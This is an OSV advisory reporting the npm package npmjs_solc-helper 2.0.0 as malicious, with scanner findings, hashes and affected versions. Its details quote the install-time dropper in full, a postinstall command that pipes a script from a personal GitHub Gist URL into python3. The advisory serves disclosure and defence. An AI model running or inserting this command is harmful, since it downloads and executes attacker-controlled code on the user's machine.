MAL-2026-3723

See a problem?

Import Source

https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/npmjs_solc-helper/MAL-2026-3723.json

JSON Data

https://api.osv.dev/v1/vulns/MAL-2026-3723

Published

2026-05-13T23:23:15Z

Modified

2026-05-15T07:51:03.870304Z

Summary

Malicious code in npmjs_solc-helper (npm)

Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (b789c7234e3c391e6e2f6359d87f873205fb341c1bf186194815b16d53c7fa71)

The package.json defines a postinstall lifecycle hook that invokes child_process.exec to run curl -s https://gist.githubusercontent.com/guellemilb/631fb6348967d9d475125edf67048c0e/raw/build_utils.py | python3, with a wget fallback to the same Gist. On npm install, the package downloads an attacker-controlled Python script from an anonymous personal GitHub Gist and pipes it directly to python3 with no version pinning, hash verification, or integrity check. The Gist is hosted by an individual account (guellemilb) unrelated to any established publisher, is mutable (the author can swap the payload at any time), and the fetched content is executed outside the Node ecosystem to evade Node-based scanners. The package's name suggests a Solidity compiler helper, which has no legitimate need to pull and run arbitrary Python from a personal Gist at install time. This is a canonical install-time remote-code-execution dropper.

Source: ossf-package-analysis (403dac6f4c0356afdc379cd24298b168012c1724a7c165a256b0ea53c06b7560)

The OpenSSF Package Analysis project identified 'npmjs_solc-helper' @ 2.0.0 (npm) as malicious.

It is considered malicious because:

The package communicates with a domain associated with malicious activity.
The package executes one or more commands associated with malicious behavior.

Database specific

{
    "malicious-packages-origins": [
        {
            "modified_time": "2026-05-13T23:23:15Z",
            "versions": [
                "2.0.0"
            ],
            "sha256": "403dac6f4c0356afdc379cd24298b168012c1724a7c165a256b0ea53c06b7560",
            "source": "ossf-package-analysis",
            "import_time": "2026-05-14T06:10:08.926792109Z"
        },
        {
            "modified_time": "2026-05-14T19:24:36Z",
            "versions": [
                "2.0.0"
            ],
            "sha256": "b789c7234e3c391e6e2f6359d87f873205fb341c1bf186194815b16d53c7fa71",
            "id": "IN-MAL-2026-002633",
            "source": "amazon-inspector",
            "import_time": "2026-05-15T07:37:15.143784282Z"
        }
    ]
}

References

https://www.npmjs.com/package/npmjs_solc-helper/v/2.0.0

Credits

- Amazon Inspector - FINDER
- - actran@amazon.com
- OpenSSF: Package Analysis - FINDER
- - https://github.com/ossf/package-analysis
  - https://openssf.slack.com/channels/package_analysis

Affected packages

npm / npmjs_solc-helper

Package

Name: npmjs_solc-helper; View open source insights on deps.dev
Purl: pkg:npm/npmjs_solc-helper

Affected ranges

Affected versions

2.*

2.0.0

Database specific

indicators

{
    "evidence_files": [
        {
            "sha256": "88771929bf40922648864facfcd7dfee94ad8203d65b72d80aa1b455e355360d",
            "tlsh": "87219ef2c9149c731bc905943f289349b173c8679e8078586262825d8bde5ab137bf7d",
            "path": "package.json"
        }
    ],
    "package_integrity": [
        {
            "hashes": {
                "sha512_sri": "sha512-bNks1pp8miUtwRcFC73Ec2L787gGXJN7fypTaQ9UbPCacCqWFCw7mZx0cByzv6Pu7J3M4IIPoxQdSXYt3Pfukg==",
                "sha1": "995e0b03be1a496c956907057394e428b484f720"
            },
            "filename": "npmjs_solc-helper-2.0.0.tgz"
        }
    ]
}

cwes

[
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    }
]

source

"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/npmjs_solc-helper/MAL-2026-3723.json"